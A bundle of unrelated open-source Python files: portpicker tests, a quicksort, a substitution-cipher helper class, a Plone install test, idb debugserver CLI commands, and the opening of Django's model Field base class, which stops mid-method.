self.assertEqual(portpicker.pick_unused_port(), 12345)
@mock.patch.dict(os.environ,{'PORTSERVER_ADDRESS': ''})
def testDoesntReuseRandomPorts(self):
ports = set()
for _ in range(10):
try:
port = portpicker.pick_unused_port()
except portpicker.NoFreePortFoundError:
# This sometimes happens when not using portserver. Just
# skip to the next attempt.
continue
ports.add(port)
portpicker.return_port(port)
self.assertGreater(len(ports), 5) # Allow some random reuse.
def testReturnsReservedPorts(self):
with mock.patch.object(portpicker, '_pick_unused_port_without_server'):
portpicker._pick_unused_port_without_server.side_effect = (
Exception('eek!'))
# Arbitrary port. In practice you should get this from somewhere
# that assigns ports.
reserved_port = 28465
portpicker.add_reserved_port(reserved_port)
ports = set()
for _ in range(10):
port = portpicker.pick_unused_port()
ports.add(port)
portpicker.return_port(port)
self.assertEqual(len(ports), 1)
self.assertEqual(ports.pop(), reserved_port)
@mock.patch.dict(os.environ,{'PORTSERVER_ADDRESS': ''})
def testFallsBackToRandomAfterRunningOutOfReservedPorts(self):
# Arbitrary port. In practice you should get this from somewhere
# that assigns ports.
reserved_port = 23456
portpicker.add_reserved_port(reserved_port)
self.assertEqual(portpicker.pick_unused_port(), reserved_port)
self.assertNotEqual(portpicker.pick_unused_port(), reserved_port)
def testRandomlyChosenPorts(self):
# Unless this box is under an overwhelming socket load, this test
# will heavily exercise the "pick a port randomly" part of the
# port picking code, but may never hit the "OS assigns a port"
# code.
ports = 0
for _ in range(100):
try:
port = portpicker._pick_unused_port_without_server()
except portpicker.NoFreePortFoundError:
# Without the portserver, pick_unused_port can sometimes fail
# to find a free port. Check that it passes most of the time.
continue
self.assertTrue(self.IsUnusedTCPPort(port))
self.assertTrue(self.IsUnusedUDPPort(port))
ports += 1
# Getting a port shouldn't have failed very often, even on machines
# with a heavy socket load.
self.assertGreater(ports, 95)
def testOSAssignedPorts(self):
self.last_assigned_port = None
def error_for_explicit_ports(port, socket_type, socket_proto):
# Only successfully return a port if an OS-assigned port is
# requested, or if we're checking that the last OS-assigned port
# is unused on the other protocol.
if port == 0 or port == self.last_assigned_port:
self.last_assigned_port = self._bind(port, socket_type,
socket_proto)
return self.last_assigned_port
else:
return None
with mock.patch.object(portpicker, 'bind', error_for_explicit_ports):
# Without server, this can be little flaky, so check that it
# passes most of the time.
ports = 0
for _ in range(100):
try:
port = portpicker._pick_unused_port_without_server()
except portpicker.NoFreePortFoundError:
continue
self.assertTrue(self.IsUnusedTCPPort(port))
self.assertTrue(self.IsUnusedUDPPort(port))
ports += 1
self.assertGreater(ports, 70)
def pickUnusedPortWithoutServer(self):
# Try a few times to pick a port, to avoid flakiness and to make sure
# the code path we want was exercised.
for _ in range(5):
try:
port = portpicker._pick_unused_port_without_server()
except portpicker.NoFreePortFoundError:
continue
else:
self.assertTrue(self.IsUnusedTCPPort(port))
self.assertTrue(self.IsUnusedUDPPort(port))
return
self.fail("Failed to find a free port")
def testPickPortsWithoutServer(self):
# Test the first part of _pick_unused_port_without_server, which
# tries a few random ports and checks is_port_free.
self.pickUnusedPortWithoutServer()
# Now test the second part, the fallback from above, which asks the
# OS for a port.
def mock_port_free(port):
return False
with mock.patch.object(portpicker, 'is_port_free', mock_port_free):
self.pickUnusedPortWithoutServer()
def checkIsPortFree(self):
"""This might be flaky unless this test is run with a portserver."""
# The port should be free initially.
port = portpicker.pick_unused_port()
self.assertTrue(portpicker.is_port_free(port))
cases = [
(socket.AF_INET, socket.SOCK_STREAM, None),
(socket.AF_INET6, socket.SOCK_STREAM, 1),
(socket.AF_INET, socket.SOCK_DGRAM, None),
(socket.AF_INET6, socket.SOCK_DGRAM, 1),
]
# Using v6only=0 on Windows doesn't result in collisions
if not _winapi:
cases.extend([
(socket.AF_INET6, socket.SOCK_STREAM, 0),
(socket.AF_INET6, socket.SOCK_DGRAM, 0),
])
for (sock_family, sock_type, v6only) in cases:
# Occupy the port on a subset of possible protocols.
try:
sock = socket.socket(sock_family, sock_type, 0)
except socket.error:
print('Kernel does not support sock_family=%d' % sock_family,
file=sys.stderr)
# Skip this case, since we cannot occupy a port.
continue
if not hasattr(socket, 'IPPROTO_IPV6'):
v6only = None
if v6only is not None:
try:
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY,
v6only)
except socket.error:
print('Kernel does not support IPV6_V6ONLY=%d' % v6only,
file=sys.stderr)
# Don't care; just proceed with the default.
# Socket may have been taken in the mean time, so catch the
# socket.error with errno set to EADDRINUSE and skip this
# attempt.
try:
sock.bind(('', port))
except socket.error as e:
if e.errno == errno.EADDRINUSE:
raise portpicker.NoFreePortFoundError
raise
# The port should be busy.
self.assertFalse(portpicker.is_port_free(port))
sock.close()
# Now it's free again.
self.assertTrue(portpicker.is_port_free(port))
def testIsPortFree(self):
# This can be quite flaky on a busy host, so try a few times.
for _ in range(10):
try:
self.checkIsPortFree()
except portpicker.NoFreePortFoundError:
pass
else:
return
self.fail("checkPortIsFree failed every time.")
def testIsPortFreeException(self):
port = portpicker.pick_unused_port()
with mock.patch.object(socket, 'socket') as mock_sock:
mock_sock.side_effect = socket.error('fake socket error', 0)
self.assertFalse(portpicker.is_port_free(port))
def testThatLegacyCapWordsAPIsExist(self):
"""The original APIs were CapWords style, 1.1 added PEP8 names."""
self.assertEqual(portpicker.bind, portpicker.Bind)
self.assertEqual(portpicker.is_port_free, portpicker.IsPortFree)
self.assertEqual(portpicker.pick_unused_port, portpicker.PickUnusedPort)
self.assertEqual(portpicker.get_port_from_port_server,
portpicker.GetPortFromPortServer)
if __name__ == '__main__':
unittest.main()
| google/python_portpicker | src/tests/portpicker_test.py | Python | apache-2.0 | 16,155 |
import __future__
import random
import insertion_sort
from sort_helper import less, exchange, test_sort
def my_sort(array):
#random.shuffle(array)
quicksort(array)
return array
def quicksort(array, begin=0, end= None):
if end is None:
end = len(array)-1
if end <= begin + 10:
array[begin:end+1] =insertion_sort.my_sort(array[begin:end+1])
return
pivot = partition(array, begin, end)
if pivot <= (begin+end)//2:
quicksort(array, 0, pivot -1)
quicksort(array, pivot+1, end)
else:
quicksort(array, pivot+1, end)
quicksort(array, 0, pivot -1)
def partition(array, begin, end):
m = median_of_three(array, begin, end)
array[begin], array[m] = array[m], array[begin]
array[begin]
value = array[begin]
i = begin+1
j = end
while True:
while array[i] < value:
i += 1
if i >= end:
break
while array[j] > value:
j -= 1
if j<= begin+1:
break
if i >= j:
break
array[i], array[j] = array[j], array[i]
array[begin], array[j] = array[j], array[begin]
return j
def median_of_three(array, begin, end):
mid = (begin + end) //2
m = [array[begin], array[mid], array[end]]
if m[0] < m[1]:
return mid if m[1] > m[2] else end
else:
return begin if m[0] < m[2] else end
if __name__ == "__main__":
test_sort(my_sort, toPrint = True, size= 10000 )
| ErikSeguinte/Personal-Code-library | Sorts/quick_sort.py | Python | mit | 1,532 |
def run(config, status):
open(config["file_to_create"], 'a').close()
| ni/hoplite | tests/test_resources/test_jobs_package/test_jobs_package/create_file_job.py | Python | mit | 73 |
import numpy as np
import random
def_alpha = ' etaoinshrdlcumwfgypbvkjxqz'
from filter import filter
class Ciphertext(object):
def __init__(self, text_indices=np.zeros(0), map_record=0, alpha=def_alpha):
if np.all(map_record == 0):
map_record = np.arange(len(alpha))
self.map_record = map_record
self.text_indices = text_indices
self.rates = [None for i in range(6)]
self.alpha = alpha
def text_in(self, text, alpha=0):
if alpha != 0:
self.alpha = alpha
filtered_text = filter(text, self.alpha)
character_index_list = [self.alpha.find(x) for x in filtered_text]
self.text_indices = np.array(character_index_list)
self.map_record = np.arange(len(self.alpha))
return None
def text_out(self, alpha=0):
if alpha == 0:
alpha = self.alpha
text = ''
for i in self.text_indices:
text += alpha[i]
return text
def map(self, new_map):
new_text_indices = np.zeros(self.text_indices.size, dtype=np.int32)
new_map_record = np.zeros(self.map_record.size, dtype=np.int32)
for i, x in enumerate(self.text_indices):
new_text_indices[i] = new_map[x]
for i, x in enumerate(self.map_record):
new_map_record[i] = new_map[x]
return Ciphertext(new_text_indices, new_map_record)
def substitute(self, new_map):
for i, x in enumerate(self.text_indices):
self.text_indices[i] = new_map[x]
for i, x in enumerate(self.map_record):
self.map_record[i] = new_map[x]
def randomise(self):
random_map = np.arange(len(self.alpha))
random.shuffle(random_map)
self.substitute(random_map)
def pair_shuffle(self):
new_map = np.arange(len(self.alpha))
[i, j] = random.sample(new_map)
self.pair_swap(i, j)
def pair_swap(self, i, j):
new_map = np.arange(len(self.alpha))
i = random.randint(0, new_map.size - 1)
if i == new_map.size - 1:
new_map[i], new_map[0] = new_map[0], new_map[i]
else:
new_map[i], new_map[i + 1] = new_map[i + 1], new_map[i]
self.substitute(new_map)
def group_frequencies(self, number):
counts = np.zeros([len(self.alpha) for i in range(number)])
for i in range(len(self.text_indices)-number):
indices = tuple(self.text_indices[i:i+number])
counts[indices] += 1
rates = counts/(len(self.text_indices)+1-number)
self.rates[number-1] = rates
return None
def pair_frequencies(self):
counts = np.zeros([len(self.alpha), len(self.alpha)])
for i in range(len(self.text_indices)-1):
counts[self.text_indices[i],self.text_indices[i+1]] += 1
rates = counts/(len(self.text_indices)-1)
self.rates[1] = rates
return None
def triplet_frequencies(self):
counts = np.zeros([len(self.alpha) for i in range(3)])
for i in range(len(self.text_indices)-2):
counts[self.text_indices[i],self.text_indices[i+1], \
self.text_indices[i+2]] += 1
rates = counts/(len(self.text_indices)-2)
self.rates[2] = rates
return None
def quadruplet_frequencies(self):
counts = np.zeros([len(self.alpha) for i in range(4)])
for i in range(len(self.text_indices)-3):
counts[self.text_indices[i],self.text_indices[i+1], \
self.text_indices[i+2],self.text_indices[i+3]] += 1
rates = counts/(len(self.text_indices)-3)
self.rates[3] = rates
return None
def pair_frequencies2(self):
record = np.zeros([len(self.text_indices)-1, 2])
for i in range(len(self.text_indices)-1):
record[i,i:i+1] = self.text_indices[i:i+1]
self.rates[1] = record
return None
| paulsbrookes/subcipher | index_based/ciphertext.py | Python | apache-2.0 | 3,930 |
import unittest2 as unittest
from Products.CMFCore.utils import getToolByName
from groupdocs.viewer_java.testing import\
GROUPDOCS_VIEWER_INTEGRATION
class TestExample(unittest.TestCase):
layer = GROUPDOCS_VIEWER_INTEGRATION
def setUp(self):
self.app = self.layer['app']
self.portal = self.layer['portal']
self.qi_tool = getToolByName(self.portal, 'portal_quickinstaller')
def test_product_is_installed(self):
""" Validate that our products GS profile has been run and the product
installed
"""
pid = 'groupdocs.viewer_java'
installed = [p['id'] for p in self.qi_tool.listInstalledProducts()]
self.assertTrue(pid in installed,
'package appears not to have been installed')
| liosha2007/plone-groupdocs-viewer-java-source | src/groupdocs/viewer_java/tests/test_example.py | Python | apache-2.0 | 805 |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from argparse import ArgumentParser, Namespace
from idb.cli import ClientCommand
from idb.common.types import Client
class DebugServerStartCommand(ClientCommand):
@property
def description(self) -> str:
return "Start the Debug Server"
@property
def name(self) -> str:
return "start"
def add_parser_arguments(self, parser: ArgumentParser) -> None:
super().add_parser_arguments(parser)
parser.add_argument("bundle_id", help="The bundle id to debug")
async def run_with_client(self, args: Namespace, client: Client) -> None:
commands = await client.debugserver_start(bundle_id=args.bundle_id)
print(*commands, sep="\n")
class DebugServerStopCommand(ClientCommand):
@property
def description(self) -> str:
return "Stop the debug server"
@property
def name(self) -> str:
return "stop"
async def run_with_client(self, args: Namespace, client: Client) -> None:
await client.debugserver_stop()
class DebugServerStatusCommand(ClientCommand):
@property
def description(self) -> str:
return "Get the status of the debug server"
@property
def name(self) -> str:
return "status"
async def run_with_client(self, args: Namespace, client: Client) -> None:
commands = await client.debugserver_status()
if commands is None:
print("Not Running")
else:
print(*commands, sep="\n")
| facebook/FBSimulatorControl | idb/cli/commands/debugserver.py | Python | mit | 1,675 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import collections
import copy
import datetime
import decimal
import itertools
import uuid
import warnings
from base64 import b64decode, b64encode
from functools import total_ordering
from django import forms
from django.apps import apps
from django.conf import settings
from django.core import checks, exceptions, validators
# When the _meta object was formalized, this exception was moved to
# django.core.exceptions. It is retained here for backwards compatibility
# purposes.
from django.core.exceptions import FieldDoesNotExist # NOQA
from django.db import connection, connections, router
from django.db.models.constants import LOOKUP_SEP
from django.db.models.query_utils import DeferredAttribute, RegisterLookupMixin
from django.utils import six, timezone
from django.utils.datastructures import DictWrapper
from django.utils.dateparse import (
parse_date, parse_datetime, parse_duration, parse_time,
)
from django.utils.deprecation import (
RemovedInDjango20Warning, warn_about_renamed_method,
)
from django.utils.duration import duration_string
from django.utils.encoding import (
force_bytes, force_text, python_2_unicode_compatible, smart_text,
)
from django.utils.functional import Promise, cached_property, curry
from django.utils.ipv6 import clean_ipv6_address
from django.utils.itercompat import is_iterable
from django.utils.text import capfirst
from django.utils.translation import ugettext_lazy as _
# Avoid "TypeError: Item in ``from list'' not a string" -- unicode_literals
# makes these strings unicode
__all__ = [str(x) for x in (
'AutoField', 'BLANK_CHOICE_DASH', 'BigAutoField', 'BigIntegerField',
'BinaryField', 'BooleanField', 'CharField', 'CommaSeparatedIntegerField',
'DateField', 'DateTimeField', 'DecimalField', 'DurationField',
'EmailField', 'Empty', 'Field', 'FieldDoesNotExist', 'FilePathField',
'FloatField', 'GenericIPAddressField', 'IPAddressField', 'IntegerField',
'NOT_PROVIDED', 'NullBooleanField', 'PositiveIntegerField',
'PositiveSmallIntegerField', 'SlugField', 'SmallIntegerField', 'TextField',
'TimeField', 'URLField', 'UUIDField',
)]
class Empty(object):
pass
class NOT_PROVIDED:
pass
# The values to use for "blank" in SelectFields. Will be appended to the start
# of most "choices" lists.
BLANK_CHOICE_DASH = [("", "---------")]
def _load_field(app_label, model_name, field_name):
return apps.get_model(app_label, model_name)._meta.get_field(field_name)
# A guide to Field parameters:
#
# * name: The name of the field specified in the model.
# * attname: The attribute to use on the model object. This is the same as
# "name", except in the case of ForeignKeys, where "_id" is
# appended.
# * db_column: The db_column specified in the model (or None).
# * column: The database column for this field. This is the same as
# "attname", except if db_column is specified.
#
# Code that introspects values, or does other dynamic things, should use
# attname. For example, this gets the primary key value of object "obj":
#
# getattr(obj, opts.pk.attname)
def _empty(of_cls):
new = Empty()
new.__class__ = of_cls
return new
def return_None():
return None
@total_ordering
@python_2_unicode_compatible
class Field(RegisterLookupMixin):
"""Base class for all field types"""
# Designates whether empty strings fundamentally are allowed at the
# database level.
empty_strings_allowed = True
empty_values = list(validators.EMPTY_VALUES)
# These track each time a Field instance is created. Used to retain order.
# The auto_creation_counter is used for fields that Django implicitly
# creates, creation_counter is used for all user-specified fields.
creation_counter = 0
auto_creation_counter = -1
default_validators = [] # Default set of validators
default_error_messages = {
'invalid_choice': _('Value %(value)r is not a valid choice.'),
'null': _('This field cannot be null.'),
'blank': _('This field cannot be blank.'),
'unique': _('%(model_name)s with this %(field_label)s '
'already exists.'),
# Translators: The 'lookup_type' is one of 'date', 'year' or 'month'.
# Eg: "Title must be unique for pub_date year"
'unique_for_date': _("%(field_label)s must be unique for "
"%(date_field_label)s %(lookup_type)s."),
}
system_check_deprecated_details = None
system_check_removed_details = None
# Field flags
hidden = False
many_to_many = None
many_to_one = None
one_to_many = None
one_to_one = None
related_model = None
# Generic field type description, usually overridden by subclasses
def _description(self):
return _('Field of type: %(field_type)s') % {
'field_type': self.__class__.__name__
}
description = property(_description)
def __init__(self, verbose_name=None, name=None, primary_key=False,
max_length=None, unique=False, blank=False, null=False,
db_index=False, rel=None, default=NOT_PROVIDED, editable=True,
serialize=True, unique_for_date=None, unique_for_month=None,
unique_for_year=None, choices=None, help_text='', db_column=None,
db_tablespace=None, auto_created=False, validators=(),
error_messages=None):
self.name = name
self.verbose_name = verbose_name # May be set by set_attributes_from_name
self._verbose_name = verbose_name # Store original for deconstruction
self.primary_key = primary_key
self.max_length, self._unique = max_length, unique
self.blank, self.null = blank, null
self.remote_field = rel
self.is_relation = self.remote_field is not None
self.default = default
self.editable = editable
self.serialize = serialize
self.unique_for_date = unique_for_date
self.unique_for_month = unique_for_month
self.unique_for_year = unique_for_year
if isinstance(choices, collections.Iterator):
choices = list(choices)
self.choices = choices or []
self.help_text = help_text
self.db_index = db_index
self.db_column = db_column
self.db_tablespace = db_tablespace or settings.DEFAULT_INDEX_TABLESPACE
self.auto_created = auto_created
# Adjust the appropriate creation counter, and save our local copy.
if auto_created:
self.creation_counter = Field.auto_creation_counter
Field.auto_creation_counter -= 1
else:
self.creation_counter = Field.creation_counter
Field.creation_counter += 1
self._validators = list(validators) # Store for deconstruction later
messages = {}
for c in reversed(self.__class__.__mro__):
messages.update(getattr(c, 'default_error_messages', {}))
messages.update(error_messages or {})
self._error_messages = error_messages # Store for deconstruction later
self.error_messages = messages
def __str__(self):
"""
Return "app_label.model_label.field_name" for fields attached to
models.
"""
if not hasattr(self, 'model'):
return super(Field, self).__str__()
model = self.model
app = model._meta.app_label
return '%s.%s.%s' % (app, model._meta.object_name, self.name)
def __repr__(self):
"""
Displays the module, class and name of the field.
"""
path = '%s.%s' % (self.__class__.__module__, self.__class__.__name__)
name = getattr(self, 'name', None)
if name is not None:
return '<%s: %s>' % (path, name)
return '<%s>' % path
def check(self, **kwargs):
errors = []
errors.extend(self._check_field_name())
errors.extend(self._check_choices())
errors.extend(self._check_db_index())
errors.extend(self._check_null_allowed_for_primary_keys())
errors.extend(self._check_backend_specific_checks(**kwargs))
errors.extend(self._check_deprecation_details())
return errors
def _check_field_name(self):
""" Check if field name is valid, i.e. 1) does not end with an
underscore, 2) does not contain "__" and 3) is not "pk". """
if self.name.endswith('_'):
return [
checks.Error(
'Field names must not end with an underscore.',
obj=self,
id='fields.E001',
)
]
elif LOOKUP_SEP in self.name:
return [
checks.Error(
'Field names must not contain "%s".' % (LOOKUP_SEP,),
obj=self,
id='fields.E002',
)
]
elif self.name == 'pk':
return [
checks.Error(
"'pk' is a reserved word that cannot be used as a field name.",
obj=self,
id='fields.E003',
)
]
else:
return []
@property
def rel(self):
warnings.warn(
"Usage of field.rel has been deprecated. Use field.remote_field instead.",
RemovedInDjango20Warning, 2)
return self.remote_field
def _check_choices(self):
if self.choices:
if (isinstance(self.choices, six.string_types) or
not is_iterable(self.choices)):
return [
checks.Error(
"'choices' must be an iterable (e.g., a list or tuple).",
obj=self,
id='fields.E004',
)
]
elif any(isinstance(choice, six.string_types) or
not is_iterable(choice) or len(choice) != 2
for choice in self.choices):
return [
checks.Error(
"'choices' must be an iterable containing "
"(actual value, human readable name) tuples.",
obj=self,
id='fields.E005',
)
]
else:
return []
else:
return []
def _check_db_index(self):
if self.db_index not in (None, True, False):
return [
checks.Error(
"'db_index' must be None, True or False.",
obj=self,
id='fields.E006',
)
]
else:
return []
def _check_null_allowed_for_primary_keys(self):
if (self.primary_key and self.null and
not connection.features.interprets_empty_strings_as_nulls):
# We cannot reliably check this for backends like Oracle which
# consider NULL and '' to be equal (and thus set up
# character-based fields a little differently).
return [
checks.Error(
'Primary keys must not have null=True.',
hint=('Set null=False on the field, or '
'remove primary_key=True argument.'),
obj=self,
id='fields.E007',
)
]
else:
return []
def _check_backend_specific_checks(self, **kwargs):
app_label = self.model._meta.app_label
for db in connections:
if router.allow_migrate(db, app_label, model_name=self.model._meta.model_name):
return connections[db].validation.check_field(self, **kwargs)
return []
def _check_deprecation_details(self):
if self.system_check_removed_details is not None:
return [
checks.Error(
self.system_check_removed_details.get(
'msg',
'%s has been removed except for support in historical '
'migrations.' % self.__class__.__name__
),
hint=self.system_check_removed_details.get('hint'),
obj=self,
id=self.system_check_removed_details.get('id', 'fields.EXXX'),
)
]
elif self.system_check_deprecated_details is not None:
return [
checks.Warning(
self.system_check_deprecated_details.get(
'msg',
'%s has been deprecated.' % self.__class__.__name__
),
hint=self.system_check_deprecated_details.get('hint'),
obj=self,
id=self.system_check_deprecated_details.get('id', 'fields.WXXX'),
)
]
return []
def get_col(self, alias, output_field=None):
if output_field is None:
output_field = self
if alias != self.model._meta.db_table or output_field != self:
from django.db.models.expressions import Col
return Col(alias, self, output_field)
else:
return self.cached_col
@cached_property
def cached_col(self):
from django.db.models.expressions import Col
return Col(self.model._meta.db_table, self)
def select_format(self, compiler, sql, params):
"""
Custom format for select clauses. For example, GIS columns need to be
selected as AsText(table.col) on MySQL as the table.col data can't be used
by Django.
"""
return sql, params
def deconstruct(self):
"""
Returns enough information to recreate the field as a 4-tuple:
* The name of the field on the model, if contribute_to_class has been run
* The import path of the field, including the class: django.db.models.IntegerField
This should be the most portable version, so less specific may be better.
* A list of positional arguments
* A dict of keyword arguments
Note that the positional or keyword arguments must contain values of the
following types (including inner values of collection types):
* None, bool, str, unicode, int, long, float, complex, set, frozenset, list, tuple, dict
* UUID
* datetime.datetime (naive), datetime.date
* top-level classes, top-level functions - will be referenced by their full import path
* Storage instances - these have their own deconstruct() method
This is because the values here must be serialized into a text format
(possibly new Python code, possibly JSON) and these are the only types
with encoding handlers defined.
There's no need to return the exact way the field was instantiated this time,
just ensure that the resulting field is the same - prefer keyword arguments
over positional ones, and omit parameters with their default values.
"""
# Short-form way of fetching all the default parameters
keywords = {}
possibles = {
"verbose_name": None,
"primary_key": False,
"max_length": None,
"unique": False,
"blank": False,
"null": False,
"db_index": False,
"default": NOT_PROVIDED,
"editable": True,
"serialize": True,
"unique_for_date": None,
"unique_for_month": None,
"unique_for_year": None,
"choices": [],
"help_text": '',
"db_column": None,
"db_tablespace": settings.DEFAULT_INDEX_TABLESPACE,
"auto_created": False,
"validators": [],
"error_messages": None,
}
attr_overrides = {
"unique": "_unique",
"error_messages": "_error_messages",
"validators": "_validators",
"verbose_name": "_verbose_name",
}
equals_comparison = {"choices", "validators", "db_tablespace"}
for name, default in possibles.items():
value = getattr(self, attr_overrides.get(name, name))
# Unroll anything iterable for choices into a concrete list
if name == "choices" and isinstance(value, collections.Iterable):
value = list(value)
# Do correct kind of comparison
if name in equals_comparison:
if value != default:
keywords[name] = value
else:
if value is not default:
keywords[name] = value
# Work out path - we shorten it for known Django core fields
path = "%s.%s" % (self.__class__.__module__, self.__class__.__name__)
if path.startswith("django.db.models.fields.related"):
path = path.replace("django.db.models.fields.related", "django.db.models")
if path.startswith("django.db.models.fields.files"):
path = path.replace("django.db.models.fields.files", "django.db.models")
if path.startswith("django.db.models.fields.proxy"):
path = path.replace("django.db.models.fields.proxy", "django.db.models")
if path.startswith("django.db.models.fields"):
path = path.replace("django.db.models.fields", "django.db.models")
# Return basic info - other fields should override this.
return (
force_text(self.name, strings_only=True),
path,
[],
keywords,
)
def clone(self):
"""
Uses deconstruct() to clone a new copy of this Field.
Will not preserve any class attachments/attribute names.
"""
name, path, args, kwargs = self.deconstruct()
return self.__class__(*args, **kwargs)
def __eq__(self, other):
# Needed for @total_ordering
if isinstance(other, Field):
return self.creation_counter == other.creation_counter
return NotImplemented
def __lt__(self, other):
# This is needed because bisect does not take a comparison function.
if isinstance(other, Field):
return self.creation_counter < other.creation_counter
return NotImplemented
def __hash__(self):
return hash(self.creation_counter)
def __deepcopy__(self, memodict):
# We don't have to deepcopy very much here, since most things are not
# intended to be altered after initial creation.
obj = copy.copy(self)
if self.remote_field:
obj.remote_field = copy.copy(self.remote_field)
if hasattr(self.remote_field, 'field') and self.remote_field.field is self:
obj.remote_field.field = obj
memodict[id(self)] = obj
return obj
def __copy__(self):
# We need to avoid hitting __reduce__, so define this
# slightly weird copy construct.
obj = Empty()
obj.__class__ = self.__class__
obj.__dict__ = self.__dict__.copy()
return obj
def __reduce__(self):
"""
Pickling should return the model._meta.fields instance of the field,
not a new copy of that field. So, we use the app registry to load the
model and then the field back.
"""
if not hasattr(self, 'model'):
# Fields are sometimes used without attaching them to models (for
# example in aggregation). In this case give back a plain field
# instance. The code below will create a new empty instance of
# class self.__class__, then update its dict with self.__dict__
# values - so, this is very close to normal pickle.
return _empty, (self.__class__,), self.__dict__
return _load_field, (self.model._meta.app_label, self.model._meta.object_name,
self.name)
def get_pk_value_on_save(self, instance):
"""
Hook to generate new PK values on save. This method is called when
saving instances with no primary key value set. If this method returns
something else than None, then the returned value is used when saving
the new instance.
"""
if self.default:
return self.get_default()
return None
def to_python(self, value):
"""
Converts the input value into the expected Python data type, raising
django.core.exceptions.ValidationError if the data can't be converted.
Returns the converted value. Subclasses should override this.
"""
return value
@cached_property
def validators(self):
"""
Some validators can't be created at field initialization time.
This method provides a way to delay their creation until required.
"""
return list(itertools.chain(self.default_validators, self._validators))
def run_validators(self, value):
if value in self.empty_values:
return
errors = []
for v in self.validators:
try:
v(value)
except exceptions.ValidationError as e:
if hasattr(e, 'code') and e.code in self.error_messages:
e.message = self.error_messages[e.code]
errors.extend(e.error_list)
if errors:
raise exceptions.ValidationError(errors)
def validate(self, value, model_instance):
"""
Validates value and throws ValidationError. Subclasses should override
this to provide validation logic.
"""
if not self.editable:
# Skip validation for non-editable fields.
return
if self.choices and value not in self.empty_values:
for option_key, option_value in self.choices:
if isinstance(option_value, (list, tuple)):
# This is an optgroup, so look inside the group for
# options.
for optgroup_key, optgroup_value in option_value:
if value == optgroup_key:
return
elif value == option_key:
return
raise exceptions.ValidationError(
self.error_messages['invalid_choice'],
code='invalid_choice',
params={'value': value},
)
if value is None and not self.null:
raise exceptions.ValidationError(self.error_messages['null'], code='null')
if not self.blank and value in self.empty_values:
raise exceptions.ValidationError(self.error_messages['blank'], code='blank')
def clean(self, value, model_instance):
"""
Convert the value's type and run validation. Validation errors
from to_python and validate are propagated. The correct value is
returned if no error is raised.
"""
value = self.to_python(value)
self.validate(value, model_instance)
self.run_validators(value)
return value
def db_check(self, connection):
"""
Return the database column check constraint for this field, for the
provided connection. Works the same way as db_type() for the case that
get_internal_type() does not map to a preexisting model field.
"""
data = DictWrapper(self.__dict__, connection.ops.quote_name, "qn_")
try:
return connection.data_type_check_constraints[self.get_internal_type()] % data
except KeyError:
return None
def db_type(self, connection):
"""
Return the database column data type for this field, for the provided
connection.
"""
# The default implementation of this method looks at the
# backend-specific data_types dictionary, looking up the field by its
# "internal type".
#
# A Field class can implement the get_internal_type() method to specify
# which *preexisting* Django Field class it's most similar to -- i.e.,
# a custom field might be represented by a TEXT column type, which is
# the same as the TextField Django field type, which means the custom
# field's get_internal_type() returns 'TextField'.
#
# But the limitation of the get_internal_type() / data_types approach
# is that it cannot handle database column types that aren't already
# mapped to one of the built-in Django field types. In this case, you
# can implement db_type() instead of get_internal_type() to specify
# exactly which wacky database column type you want to use.
data = DictWrapper(self.__dict__, connection.ops.quote_name, "qn_")
try:
return connection.data_types[self.get_internal_type()] % data
except KeyError:
return None
def rel_db_type(self, connection):
"""
Return the data type that a related field pointing to this field should
use. For example, this method is called by ForeignKey and OneToOneField
to determine its data type.
"""
return self.db_type(connection)
def db_parameters(self, connection):
"""
Extension of db_type(), providing a range of different return
values (type, checks).
This will look at db_type(), allowing custom model fields to override it.
"""
type_string = self.db_type(connection)
check_string = self.db_check(connection)
return {
"type": type_string,
"check": check_string,
}
def db_type_suffix(self, connection):
return connection.data_types_suffix.get(self.get_internal_type())
def get_db_converters(self, connection):
if hasattr(self, 'from_db_value'):
return [self.from_db_value]
return []
@property
def unique(self):
return self._unique or self.primary_key
def set_attributes_from_name(self, name):
if not self.name:
self.name = name
self.attname, self.column = self.get_attname_column()
self.concrete = self.column is not None
if self.verbose_name is None and self.name:
self.verbose_name = self.name.replace('_', ' ')
def contribute_to_class(self, cls, name, private_only=False, virtual_only=NOT_PROVIDED):
"""
Register the field with the model class it belongs to.
If private_only is True, a separate instance of this field will be
created for every subclass of cls, even if cls is not an abstract
model.
"""
if virtual_only is not NOT_PROVIDED:
warnings.warn(
"The `virtual_only` argument of Field.contribute_to_class() "
"has been renamed to `private_only`.",
RemovedInDjango20Warning, stacklevel=2
)
private_only = virtual_only
self.set_attributes_from_name(name)
self.model = cls
if private_only:
cls._meta.add_field(self, private=True)
else:
cls._meta.add_field(self)
if self.column:
# Don't override classmethods with the descriptor. This means that
# if you have a classmethod and a field with the same name, then
# such fields can't be deferred (we don't have a check for this).
if not getattr(cls, self.attname, None):
setattr(cls, self.attname, DeferredAttribute(self.attname, cls))
if self.choices:
setattr(cls, 'get_%s_display' % self.name,
curry(cls._get_FIELD_display, field=self))
def get_filter_kwargs_for_object(self, obj):
"""
Return a dict that when passed as kwargs to self.model.filter(), would
yield all instances having the same value for this field as obj has.
"""
return {self.name: getattr(obj, self.attname)}
def get_attname(self):
return self.name
def get_attname_column(self):
attname = self.get_attname()
column = self.db_column or attname
return attname, column
def get_cache_name(self):
return '_%s_cache' % self.name
def get_internal_type(self):
return self.__class__.__name__
def pre_save(self, model_instance, add):
"""
Returns field's value just before saving.
"""
return getattr(model_instance, self.attname)
def get_prep_value(self, value):
"""
Perform preliminary non-db specific value checks and conversions.
"""
if isinstance(value, Promise):
value = value._proxy____cast()
return value
def get_db_prep_value(self, value, connection, prepared=False):
"""Returns field's value prepared for interacting with the database
backend.
Used by the default implementations of get_db_prep_save().
"""
if not prepared:
value = self.get_prep_value(value)
return value
def get_db_prep_save(self, value, connection):
"""
Returns field's value prepared for saving into a database.
"""
return self.get_db_prep_value(value, connection=connection,
prepared=False)
def has_default(self):
"""
Returns a boolean of whether this field has a default value.
"""
return self.default is not NOT_PROVIDED
def get_default(self):
"""
Returns the default value for this field.
"""
return self._get_default()
@cached_property
def _get_default(self):
if self.has_default():
if callable(self.default):
return self.default
return lambda: self.default
if not self.empty_strings_allowed or self.null and not connection.features.interprets_empty_strings_as_nulls:
return return_None
return six.text_type # returns empty string
def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH, limit_choices_to=None):
"""Returns choices with a default blank choices included, for use
as SelectField choices for this field."""
blank_defined = False
